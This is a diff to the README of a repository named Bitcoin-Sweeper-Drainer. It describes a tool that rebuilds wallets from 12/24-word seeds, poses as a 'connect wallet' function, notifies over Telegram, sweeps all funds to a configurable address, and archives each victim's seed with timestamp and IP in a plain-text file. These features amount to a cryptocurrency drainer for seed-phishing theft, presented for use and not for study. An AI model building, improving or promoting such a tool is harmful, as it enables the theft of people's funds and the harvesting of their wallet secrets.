martok9803/Bitcoin-Sweeper-Drainer/README.md

     * Re-creates the wallet from any 12/24-word BIP39 seed.
     * It can be used also a "connect wallet function.
     * It may send notifications to telegram.
-    * Scans blockchain, builds one transaction, sweeps **all** UTXOs to a fixed cold-storage address.
+    * Scans blockchain, builds one transaction, sweeps **all** UTXOs to a fixed cold-storage address which can be changed always in terms of the needs.
 3.  **Plain-text seed archive** (optional)
     * Each sweep appends `UTC timestamp · IP · seed` to `~/crypto/seeds.txt`.
 4.  **Privacy & logging**